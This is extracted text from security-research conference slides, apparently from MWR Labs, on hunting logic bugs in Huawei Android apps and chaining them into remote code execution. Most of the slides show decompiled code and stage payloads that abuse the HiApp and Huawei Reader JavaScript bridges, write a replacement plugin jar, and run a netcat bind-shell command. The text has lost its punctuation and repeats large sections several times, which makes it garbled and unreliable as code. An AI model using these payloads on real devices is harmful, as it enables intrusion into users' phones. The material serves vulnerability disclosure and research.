ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
